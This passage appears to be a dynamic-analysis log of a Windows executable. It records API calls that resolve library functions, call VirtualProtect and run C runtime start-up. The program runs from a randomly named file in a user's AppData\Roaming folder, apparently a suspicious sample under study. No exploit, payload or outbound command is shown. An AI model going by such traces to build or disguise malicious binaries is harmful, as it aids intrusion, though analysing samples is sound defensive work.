(lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0100.457] GetProcAddress (hModule=0x75fd0000, lpProcName="SHBrowseForFolderA") returned 0x7621dc6a [0100.457] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0100.457] GetProcAddress (hModule=0x75340000, lpProcName="StrChrA") returned 0x7534c5e6 [0100.457] GetProcAddress (hModule=0x75340000, lpProcName="PathAppendA") returned 0x7534d65e [0100.457] GetProcAddress (hModule=0x75340000, lpProcName="PathCombineW") returned 0x7535c39c [0100.458] GetProcAddress (hModule=0x75340000, lpProcName="PathCreateFromUrlA") returned 0x7536c1e9 [0100.458] GetProcAddress (hModule=0x75340000, lpProcName="PathFileExistsW") returned 0x753545bf [0100.458] GetProcAddress (hModule=0x75340000, lpProcName="PathBuildRootW") returned 0x7535b265 [0100.458] GetProcAddress (hModule=0x75340000, lpProcName="PathUnquoteSpacesA") returned 0x7536ecc7 [0100.458] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0100.458] GetProcAddress (hModule=0x74f40000, lpProcName="LoadCursorA") returned 0x74f5dad5 [0100.458] GetProcAddress (hModule=0x74f40000, lpProcName="CheckMenuItem") returned 0x74f6a88c [0100.458] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindow") returned 0x74f5926e [0100.458] GetProcAddress (hModule=0x74f40000, lpProcName="DialogBoxParamA") returned 0x74f9cb0c [0100.458] GetProcAddress (hModule=0x74f40000, lpProcName="ValidateRect") returned 0x74f67849 [0100.458] GetProcAddress (hModule=0x74f40000, lpProcName="EndPaint") returned 0x74f61341 [0100.458] GetProcAddress (hModule=0x74f40000, lpProcName="DestroyWindow") returned 0x74f59a55 [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="SetCursor") returned 0x74f641f6 [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="GetSystemMenu") returned 0x74f66ea6 [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="ScreenToClient") returned 0x74f6227d [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowRect") returned 0x74f57f34 [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="PostQuitMessage") returned 0x74f59abb [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowDC") returned 0x74f58048 [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="FillRect") returned 0x74f60eb6 [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemID") returned 0x74f6a725 [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="SetKeyboardState") returned 0x74f814b2 [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="SetCapture") returned 0x74f7ed56 [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="GetSubMenu") returned 0x74f66d73 [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="LoadBitmapA") returned 0x74f67cc2 [0100.459] GetProcAddress (hModule=0x74f40000, lpProcName="IsClipboardFormatAvailable") returned 0x74f68676 [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="GetParent") returned 0x74f60f68 [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="LoadMenuA") returned 0x74f74eef [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="LoadIconA") returned 0x74f5dafb [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="IsWindowEnabled") returned 0x74f62c1b [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="MenuItemFromPoint") returned 0x74fb874b [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="GetClientRect") returned 0x74f60c62 [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="CreateMenu") returned 0x74f657a4 [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="SendMessageA") returned 0x74f6612e [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="BeginPaint") returned 0x74f61361 [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="GetIconInfo") returned 0x74f649ea [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="GetUpdateRect") returned 0x74f7d41f [0100.460] GetProcAddress (hModule=0x74f40000, lpProcName="GetDC") returned 0x74f572c4 [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="DrawFocusRect") returned 0x74f689c2 [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="GetKeyboardState") returned 0x74f7ec68 [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="GetForegroundWindow") returned 0x74f62320 [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenu") returned 0x74f65041 [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowPlacement") returned 0x74f62aca [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowTextA") returned 0x74f60029 [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemRect") returned 0x74fb82ef [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="TrackPopupMenuEx") returned 0x74f7c2ac [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="GetAsyncKeyState") returned 0x74f7eb96 [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="SetRect") returned 0x74f60e1b [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="SetWindowLongA") returned 0x74f66110 [0100.461] GetProcAddress (hModule=0x74f40000, lpProcName="MessageBoxA") returned 0x74fafd1e [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="UnionRect") returned 0x74f626a8 [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="BringWindowToTop") returned 0x74f67b3b [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="CharLowerA") returned 0x74f63e75 [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowLongA") returned 0x74f5d156 [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="CreateWindowExA") returned 0x74f5d22e [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="ReleaseDC") returned 0x74f57446 [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="SetClassLongA") returned 0x74f6d5f9 [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="GetDlgItem") returned 0x74f7f1ba [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="EndDialog") returned 0x74f7b99c [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="DefWindowProcA") returned 0x771724e0 [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="SetWindowPos") returned 0x74f58e4e [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="GetCursorPos") returned 0x74f61218 [0100.462] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemInfoA") returned 0x74f673a1 [0100.463] GetProcAddress (hModule=0x74f40000, lpProcName="AppendMenuA") returned 0x74fb67fb [0100.463] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemCount") returned 0x74f6563b [0100.463] GetProcAddress (hModule=0x74f40000, lpProcName="ReleaseCapture") returned 0x74f7ed49 [0100.463] GetProcAddress (hModule=0x74f40000, lpProcName="InsertMenuA") returned 0x74fb67b8 [0100.463] GetProcAddress (hModule=0x74f40000, lpProcName="SetWindowTextA") returned 0x74f67aee [0100.463] GetProcAddress (hModule=0x74f40000, lpProcName="SendMessageW") returned 0x74f59679 [0100.463] GetProcAddress (hModule=0x74f40000, lpProcName="UpdateWindow") returned 0x74f63559 [0100.463] GetProcAddress (hModule=0x74f40000, lpProcName="CallWindowProcA") returned 0x74f6792f [0100.463] GetProcAddress (hModule=0x74f40000, lpProcName="FindWindowA") returned 0x74f5ffe6 [0100.463] LoadLibraryA (lpLibFileName="WINTRUST.dll") returned 0x74de0000 [0100.463] GetProcAddress (hModule=0x74de0000, lpProcName="CryptCATGetMemberInfo") returned 0x74deec94 [0100.463] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0100.463] GetProcAddress (hModule=0x75bc0000, lpProcName=0x73) returned 0x75bc3ab2 [0100.464] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0100.464] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0100.464] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xbfbe8b70, dwHighDateTime=0x1d59514)) [0100.464] GetCurrentProcessId () returned 0x83c [0100.464] GetCurrentThreadId () returned 0x7bc [0100.464] GetTickCount () returned 0x115275f [0100.464] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=22068669404) returned 1 [0100.464] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x40c433)) [0100.464] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.464] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x34d0000 [0100.465] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0100.465] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0100.465] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0100.465] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0100.465] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0100.466] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x214) returned 0x34d07d0 [0100.466] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0100.466] GetCurrentThreadId () returned 0x7bc [0100.466] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40b04e, hStdOutput=0x40b387, hStdError=0x34d07d0)) [0100.466] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x8, Size=0x800) returned 0x34d09f0 [0100.466] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0100.466] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0100.466] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0100.466] SetHandleCount (uNumber=0x20) returned 0x20 [0100.466] GetCommandLineA () returned="\"C:/Users/5p5NrGJn0jS HALPmcxz/AppData/Roaming/gtjtdfe\"" [0100.466] GetEnvironmentStringsW () returned 0x30dd50* [0100.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0100.466] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x565) returned 0x34d11f8 [0100.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x34d11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0100.467] FreeEnvironmentStringsW (penv=0x30dd50) returned 1 [0100.467] GetLastError () returned 0x0 [0100.467] SetLastError (dwErrCode=0x0) [0100.467] GetLastError () returned 0x0 [0100.467] SetLastError (dwErrCode=0x0) [0100.467] GetLastError () returned 0x0 [0100.467] SetLastError (dwErrCode=0x0) [0100.467] GetACP () returned 0x4e4 [0100.467] RtlAllocateHeap (HeapHandle=0x34d0000, Flags=0x0, Size=0x220) returned 0x34d1768 [0100.467] GetLastError () returned 0x0 [0100.467] SetLastError (dwErrCode=0x0) [0100.467] IsValidCodePage (CodePage=0x4e4) returned 1 [0100.467] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0100.467] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0100.467] GetLastError () returned 0x0 [0100.467] SetLastError (dwErrCode=0x0) [0100.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0100.467] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0100.467] GetLastError () returned 0x0 [0100.467] SetLastError (dwErrCode=0x0) [0100.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梳鼵ʪAĀ") returned 256 [0100.467] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梳鼵ʪAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0100.467] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梳鼵ʪAĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0100.467] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\nã\x03\x9c\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0100.467] GetLastError () returned 0x0 [0100.468] SetLastError (dwErrCode=0x0) [0100.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0100.468] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梳鼵ʪAĀ") returned 256 [0100.468] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梳鼵ʪAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0100.468] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ梳鼵ʪAĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0100.468] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 